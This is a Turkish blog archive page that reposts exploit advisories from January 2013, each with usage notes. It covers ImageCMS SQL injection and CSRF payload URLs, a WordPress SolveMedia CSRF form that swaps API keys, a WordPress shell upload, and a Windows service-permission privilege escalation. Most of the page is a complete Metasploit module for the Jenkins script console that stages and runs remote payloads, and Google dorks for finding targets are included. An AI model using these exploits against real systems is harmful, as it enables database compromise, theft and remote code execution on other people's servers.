Archive for 25 Ocak 2013

ImageCMS 4.0.0b Multiple Vulnerabilities

ImageCMS 4.0.0b versiyonunda genel SQL injection açıkları bulundu.
SQL injection oluşum yerleri ve kullanımı ile ilgili exploit aşağıda yer almaktadır.

Advisory ID: HTB23132
Product: ImageCMS
Vendor: www.imagecms.net
Vulnerable Version(s): 4.0.0b and probably prior
Tested Version: 4.0.0b
Vendor Notification: December 5, 2012 
Vendor Patch: January 16, 2013 
Public Disclosure: January 23, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-6290
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks.


1)  SQL injection vulnerability in ImageCMS: CVE-2012-6290

The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on the database and system configuration PoC (Proof-of-Concept) code below will create "/tmp/file.txt" file with MySQL server version inside:


http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202


This vulnerability can also be exploited by remote non-authenticated attacker via CSRF vector because the application is prone to Cross-Site Request Forgery attack. In order to do so attacker should trick a logged-in administrator to visit a web page with CSRF exploit. 

Basic CSRF exploit example:


<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to ImageCMS 4.2

More Information:
http://forum.imagecms.net/viewtopic.php?id=1436
http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23132 - https://www.htbridge.com/advisory/HTB23132 - SQL Injection Vulnerability in ImageCMS.
[2] ImageCMS - http://www.imagecms.net - A free modern Web 3.0 content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

WordPress SolveMedia 1.1.0 CSRF Vulnerability

WordPress SolveMedia 1.1.0 versiyonunda CSRF açığı bulundu. Açık sayesinde bir takım zararlı kodlar çalıştırılabilmekte site üzerinden bir takım bilgiler alınabilmektedir. Açıkğa ilişkin exploit code kullanım şekli şu şekilde;

# Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability
# Release Date: 24/01/13
# Author: Junaid Hussain - [ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
# Software Link: http://downloads.wordpress.org/plugin/solvemedia.1.1.0.zip
# Vendor Homepage: http://solvemedia.com
# Tested on: CentOs 5
# Google Dork: inurl:wp-content/plugins/solvemedia
-----------------------------------------------------------------------------------------------------------------------
//##### Introduction: 
SolveMedia is a capatcha service that allows webmasters to monetize
from correct captcha type-ins, solvemedia.admin.inc is vulnerable to CSRF,
there is no anti-CSRF tokens implemented nor is the wp-nonce function used,
therefore an attacker can change the webmasters SolveMedia API Keys (public key, 
private key, hash key) to the attackers own set of API keys thus stealing
the webmasters SolveMedia revenue.
-------------------------------------------------------------------------------------------------------------------------
//##### CSRF - Proof Of Concept:
<html>
<form  method="post" action="http://server/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true">
<input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/>                       
<input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/>
<input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" />
<input type="submit" name="submit" value="Enter" />	
</form>
</html>
\\##### End Poc #####
-------------------------------------------------------------------------------------------------------------------------
//##### Patch:
-- Vendor was notified on the 22/01/2013
-- Vendor released version 1.1.1 on 23/01/2013 which included a patch
--- Patched Version (1.1.1): http://wordpress.org/extend/plugins/solvemedia/
--- ChangeLog: http://wordpress.org/extend/plugins/solvemedia/changelog/
-------------------------------------------------------------------------------------------------------------------------
//##### Original: http://illSecure.com/code/Wordpress-SolveMedia-CSRF-Vulnerability.txt

WordPress File Uploader Plugin PHP File Upload Vulnerability

WordPress ve joomlanın bitip tükenmeyen PHP file uload açıkları tüm hızıyla bulunmaya devam ediliyor.
Gene wordpress eklentilerinden File Uplooder Eklentisinde bulunan açık ve kullanım şekli şu şekilde;

# Exploit Title: WordPress File Uploader Plugin PHP File Upload Vulnerability
# Date: 01/21/2013
# Google Dork: inurl:"wp-file-uploader.php"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-file-uploader-1.1.txt
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-file-uploader/
# Software Link: http://downloads.wordpress.org/plugin/wp-file-uploader.zip
# Version: 1.1 and probably prior
# Tested on: WordPress 3.5 on Windows and Linux
 
Vulnerable Code: (process-form.php)
 
97: $filepart = fileinformation( $_FILES['postimage']['name'] );
98: $filename = $filepart['basename'];
99: // check if this filename already exist in the folder
100: $i = 2;
101: while ( in_array( $filename, $imageslist ) ) {
102: $filename = $filepart['filename'] . '_' . $i++ . '.' .$filepart['extension'];
103: }
104:  move_uploaded_file($_FILES["postimage"]["tmp_name"], $file_path.$filename);
 
Description:
 
Plugin simply upload the attachment with original name and extension to "wp-content/uploads/".
An attacker can upload php files and access them from remote.
 
Proof of Concept:
 
1. Visit vulnerable target and navigate to the "File Uploader" site.
2. Upload a file named shell.php
3. Access it with the browser on example.com/wp-content/uploads/shell.php
 
Done!
 
Proof Video: http://goo.gl/ogbsA

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation açığına ilişkin açığın localde kullanım şekli ve açığın oluşumu şu şekilde;

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability


Vendor: Aloaha Software - Wrocklage Intermedia GmbH
Product web page: http://www.aloaha.com
Affected version: 5.0.226

Summary: Aloaha Credential Provider represents one of the most dramatic changes
in the Windows Vista / 7 logon screen, making it much easier to implement new user
authentication scenarios that are supported by the OS. To be able to logon via
Smartcard to a windows machine requires usually the machine being a member of a
domain. With the Aloaha Credential Provider that is not required, the logon screen
is the first thing users see when they turn on the computer.

Desc: The Aloaha Credential Provider Service is vulnerable to an elevation of
privileges vulnerability which can be used by a simple user that can change the
executable file with a binary of choice. The vulnerability exist due to the
improper permissions, with the 'F' flag (full) for the 'Everyone' group, for the
'AloahaCredentialProviderService.exe' binary file. The service was shipped with
Aloaha PDF Saver and possibly every SmartCard Software package from Aloaha. The
files are installed in the 'Wrocklage' directory which has the Everyone group
assigned to it with full permissions making every single file inside vulnerable
to change by any user on the affected machine. After you replace the binary with
your rootkit, on reboot you get SYSTEM privileges.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit/64bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5124
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5124.php


19.01.2013


---------------------------------------------------------------------------------

C:\Program Files\Wrocklage>sc qc AloahaCPM
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AloahaCPM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Aloaha Credential Provider Monitor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Program Files\Wrocklage>cacls AloahaCredentialProviderService.exe
C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F
                                                               Everyone:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               BUILTIN\Users:(ID)R


C:\Program Files\Wrocklage>

---------------------------------------------------------------------------------

Jenkins Script-Console Java Execution

Jenkins Script-Console Java Execution açığına ilişkin olarak metasploit exploit aşağıdaki gibidir.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Jenkins Script-Console Java Execution',
			'Description'    => %q{
					This module uses the Jenkins Groovy script console to execute
				OS commands using Java.
			},
			'Author'	=>
				[
					'Spencer McIntyre',
					'jamcut'
				],
			'License'        => MSF_LICENSE,
			'DefaultOptions' =>
				{
					'WfsDelay' => '10',
				},
			'References'     =>
				[
					['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
				],
			'Targets'		=>
				[
					['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
					['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
					['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
				],
			'DisclosureDate' => 'Jan 18 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
				OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
				OptString.new('TARGETURI', [ true,  'The path to jenkins', '/jenkins/' ]),
			], self.class)
	end

	def check
		uri = target_uri
		uri.path = normalize_uri(uri.path)
		uri.path << "/" if uri.path[-1, 1] != "/"
		res = send_request_cgi({'uri' => "#{uri.path}login"})
		if res and res.headers.include?('X-Jenkins')
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	def on_new_session(client)
		if not @to_delete.nil?
			print_warning("Deleting #{@to_delete} payload file")
			execute_command("rm #{@to_delete}")
		end
	end

	def http_send_command(cmd, opts = {})
		request_parameters = {
			'method'    => 'POST',
			'uri'       => "#{@uri.path}script",
			'vars_post' =>
				{
					'script' => java_craft_runtime_exec(cmd),
					'Submit' => 'Run'
				}
		}
		request_parameters['cookie'] = @cookie if @cookie != nil
		res = send_request_cgi(request_parameters)
		if not (res and res.code == 200)
			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
		end
	end

	def java_craft_runtime_exec(cmd)
		decoder = Rex::Text.rand_text_alpha(5, 8)
		decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
		cmd_array = Rex::Text.rand_text_alpha(5, 8)
		jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
		jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"

		jcode << "String [] #{cmd_array} = new String[3];\n"
		if target['Platform'] == 'win'
			jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
			jcode << "#{cmd_array}[1] = \"/c\";\n"
		else
			jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
			jcode << "#{cmd_array}[1] = \"-c\";\n"
		end
		jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
		jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
		jcode
	end

	def execute_command(cmd, opts = {})
		vprint_status("Attempting to execute: #{cmd}")
		http_send_command("#{cmd}")
	end

	def linux_stager
		cmds = "echo LINE | tee FILE"
		exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
		base64 = Rex::Text.encode_base64(exe)
		base64.gsub!(/\=/, "\\u003d")
		file = rand_text_alphanumeric(4+rand(4))

		execute_command("touch /tmp/#{file}.b64")
		cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
		base64.each_line do |line|
			line.chomp!
			cmd = cmds
			cmd.gsub!(/LINE/, line)
			execute_command(cmds)
		end

		execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
		execute_command("chmod +x /tmp/#{file}")
		execute_command("rm /tmp/#{file}.b64")

		execute_command("/tmp/#{file}")
		@to_delete = "/tmp/#{file}"
	end


	def exploit
		@uri = target_uri
		@uri.path = normalize_uri(@uri.path)
		@uri.path << "/" if @uri.path[-1, 1] != "/"
		print_status('Checking access to the script console')
		res = send_request_cgi({'uri' => "#{@uri.path}script"})
		fail_with(Exploit::Failure::Unknown) if not res

		@cookie = nil
		if res.code != 200
			print_status('Logging in...')
			res = send_request_cgi({
				'method'    => 'POST',
				'uri'       => "#{@uri.path}j_acegi_security_check",
				'vars_post' =>
					{
						'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
						'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
						'Submit'     => 'log in'
					}
			})

			if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
				fail_with(Exploit::Failure::NoAccess, 'login failed')
			end
			sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]
			@cookie = "#{sessionid}"
		else
			print_status('No authentication required, skipping login...')
		end

		case target['Platform']
		when 'win'
			print_status("#{rhost}:#{rport} - Sending VBS stager...")
			execute_cmdstager({:linemax => 2049})
		when 'unix'
			print_status("#{rhost}:#{rport} - Sending payload...")
			http_send_command("#{payload.encoded}")
		when 'linux'
			print_status("#{rhost}:#{rport} - Sending Linux stager...")
			linux_stager
		end

		handler
	end
end